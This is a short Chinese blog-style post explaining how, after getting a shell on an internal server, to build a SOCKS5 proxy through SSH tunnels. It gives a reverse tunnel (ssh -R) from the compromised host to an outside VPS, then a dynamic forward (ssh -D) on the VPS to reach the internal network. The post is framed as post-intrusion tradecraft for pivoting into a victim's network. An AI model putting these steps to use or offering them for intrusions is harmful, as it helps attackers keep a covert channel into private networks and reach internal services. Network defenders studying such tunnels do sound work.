在getshell内网服务器后,通常需要搭建代理访问内网服务。这里简单介绍一下如何使用SSH tunnel实现socks5代理。其实就是两条命令~

步骤:

# 条件:
#   1. 一个内网开放sshd的服务
#   2. 有登陆该ssh权限的user/password
# 步骤1:
#   在内网将22 port转发给远程vps的22222 port,执行后需要登陆vps。
ssh -R 22222:127.0.0.1:22 [email protected]<vps-ip>
# 步骤2:
#   在vps上,监听23333端口,一旦有数据,就自动转发到2222port上。
ssh -D 0.0.0.0:23333 [email protected] -p 22222
# 步骤3:
#   最终socks5代理:
echo "socks5://vps-ip:23333"

参考

SSH的高级用法参考:

ipvs负载均衡技术也可以了解一下: